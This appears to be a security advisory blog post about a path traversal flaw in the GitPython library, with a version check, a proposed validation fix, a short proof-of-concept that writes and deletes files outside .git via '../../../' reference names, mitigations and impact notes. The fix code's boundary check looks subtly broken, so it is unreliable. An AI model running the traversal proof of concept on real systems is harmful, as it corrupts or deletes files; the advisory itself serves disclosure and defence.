Listen to this Post
The vulnerability, tracked as VU128348, allows attackers to write, overwrite, move, or delete files outside the repository’s `.git` directory. The root cause lies in insufficient validation of reference paths during reference creation, rename, and delete operations. Specifically, the functions `SymbolicReference._check_ref_name_valid()` rejects traversal sequences like .., but functions such as SymbolicReference.create, Reference.create, SymbolicReference.set_reference, SymbolicReference.rename, and `SymbolicReference.delete` construct filesystem paths from attacker-controlled reference names without enforcing repository boundaries. This allows a local user to supply a crafted reference path (e.g., ../../../outside.txt) to write or delete files outside the intended directory. The attack vector requires the ability to influence reference names supplied by the consuming application. Successful exploitation can lead to file corruption, deletion, or overwriting of critical system files, resulting in denial of service or integrity compromise. Remediation requires updating to a patched version of GitPython that implements proper path validation before filesystem operations. This issue affects GitPython versions <= 3.1.46 and the current main branch as of the report.
Platform: Python library Version: 3.1.46 Vulnerability: Path Traversal Severity: Critical date: 2026-05-06 Prediction: 2026-05-06
What Undercode Say:
Check vulnerable GitPython version
pip show gitpython | grep Version
Validate reference path before write
def _validate_ref_write_path(repo, path, for_git_dir=False):
base = Path(repo.git_dir if for_git_dir else repo.common_dir).resolve()
target = (base / path).resolve()
if base not in [target, target.parents]:
raise ValueError(f"Reference path escapes: {path}")
return str(target)
Example of safe reference creation
def secure_ref_create(repo, ref_path, target):
safe_path = _validate_ref_write_path(repo, ref_path)
Reference.create(repo, safe_path, target)
Exploit:
from git import Repo
from git.refs.reference import Reference
from git.refs.symbolic import SymbolicReference
repo = Repo.init("/tmp/vuln_repo")
Write outside .git
Reference.create(repo, "../../../pwned.txt", "HEAD")
Delete outside .git
SymbolicReference.delete(repo, "../../../target.txt")
Protection from this CVE:
- Upgrade to GitPython >= 3.1.47
- Apply strict reference path validation before write/delete operations
- Use `_validate_ref_write_path()` as a whitelist check
- Set restrictive filesystem permissions for application user
- Avoid exposing reference APIs to untrusted user input
Impact:
- Write/Overwrite: Attacker can write arbitrary files, corrupting configs or planting backdoors
- Delete: Attacker can delete critical files, causing denial of service
- Move/Rename: Attacker can relocate sensitive files, leading to information disclosure or privilege escalation
- Integrity: High – system files and application state can be compromised
- Availability: High – deletion of essential files can disrupt services
- Affected: Applications using GitPython reference operations with user-controlled input, such as Git automation services, CI/CD helpers, and multi-user repository management platforms
References:
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
